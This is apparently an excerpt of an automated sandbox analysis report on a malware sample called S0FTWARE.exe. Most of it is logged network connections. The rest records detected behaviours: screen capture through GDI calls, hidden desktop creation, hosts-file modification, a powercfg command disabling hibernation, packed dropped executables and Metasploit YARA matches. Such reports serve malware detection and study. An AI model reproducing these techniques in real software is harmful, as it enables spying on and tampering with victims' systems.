                        Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50139 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                        Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49704 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49707 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49829 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 116.203.0.159:443 -> 192.168.2.5:49836 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49913 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.5:50137 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 3.5.30.241:443 -> 192.168.2.5:50138 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 51.105.71.136:443 -> 192.168.2.5:50155 version: TLS 1.2
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A13BB1 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,3_2_02A13BB1
                        Source: S0FTWARE.exe, 00000000.00000002.2229780239.000000000107A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: tGC (fractional)Gateway TimeoutGdiplusShutdownGetActiveObjectGetActiveWindowGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetDpiForWindowGetEnhMetaFileWGetGuildInvitesGetGuildPreviewGetGuildStickerGetModuleHandleGetMonitorInfoWGetProcessTimesGetRawInputDataGetSecurityInfoGetStartupInfoWGetTextMetricsWGetThreadLocaleGetThreadMemberGot version 2 !GreaterGreater;Group: bad kindHanifi_RohingyaHeatReducedTempHitachi SH3 DSPHorizontalLine;HotWaterOutTempIdempotency-KeyImpersonateSelfImportEntrySizeIndonesian (id)InsertMenuItemWInvalidArgumentInvisibleComma;InvisibleTimes;IsWindowEnabledIsWindowUnicodeIsWindowVisibleIsWow64Process2IsolationLevel(Jan _2 15:04:05Konsep skenarioLeftDownVector;LeftRightArrow;Leftrightarrow;Length RequiredLessSlantEqual;LessThanOrEqualListGuildEmojisLithuanian (lt)LoadLibraryExAmemstr_ed804826-3

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Modifies the hosts file
                        Source: C:\ProgramData\AAFIJKKEHJ.exeFile written: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A08DEA _memset,wsprintfA,OpenDesktopA,CreateDesktopA,_memset,lstrcat,lstrcat,lstrcat,_memset,lstrcpy,_memset,CreateProcessA,Sleep,CloseDesktop,3_2_02A08DEA

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 00000000.00000002.2247474253.0000000013A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                        Source: 00000000.00000002.2246493920.00000000133E8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                        Source: 00000000.00000003.2192615630.00000000133E8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                        PE file contains section with special chars
                        Source: AAFIJKKEHJ.exe.3.drStatic PE information: section name: .vmp$
                        Source: AAFIJKKEHJ.exe.3.drStatic PE information: section name: .vmp$
                        Source: AAFIJKKEHJ.exe.3.drStatic PE information: section name: .vmp$
                        Source: NewApp[1].exe.3.drStatic PE information: section name: .vmp$
                        Source: NewApp[1].exe.3.drStatic PE information: section name: .vmp$
                        Source: NewApp[1].exe.3.drStatic PE information: section name: .vmp$
                        Source: GHDAKKJJJK.exe.3.drStatic PE information: section name: .vmp$
                        Source: GHDAKKJJJK.exe.3.drStatic PE information: section name: .vmp$
                        Source: GHDAKKJJJK.exe.3.drStatic PE information: section name: .vmp$
                        Source: Updater[1].exe.3.drStatic PE information: section name: .vmp$
                        Source: Updater[1].exe.3.drStatic PE information: section name: .vmp$
                        Source: Updater[1].exe.3.drStatic PE information: section name: .vmp$
                        Source: Updater.exe.20.drStatic PE information: section name: .vmp$
                        Source: Updater.exe.20.drStatic PE information: section name: .vmp$
                        Source: Updater.exe.20.drStatic PE information: section name: .vmp$
                        Source: service.exe.54.drStatic PE information: section name: .vmp$
                        Source: service.exe.54.drStatic PE information: section name: .vmp$
                        Source: service.exe.54.drStatic PE information: section name: .vmp$
                        Uses powercfg.exe to modify the power settings
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0144B GetCurrentProcess,NtQueryInformationProcess,3_2_02A0144B
                        Source: C:\ProgramData\AAFIJKKEHJ.exeCode function: 20_2_00007FF6AD6D1394 NtCancelTimer2,20_2_00007FF6AD6D1394
                        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                        Source: C:\Users\user\Desktop\S0FTWARE.exeCode function: 0_3_12E9D50C0_3_12E9D50C
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A07FAB3_2_02A07FAB
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A2EA433_2_02A2EA43
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A2F1B33_2_02A2F1B3
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A1CEF43_2_02A1CEF4
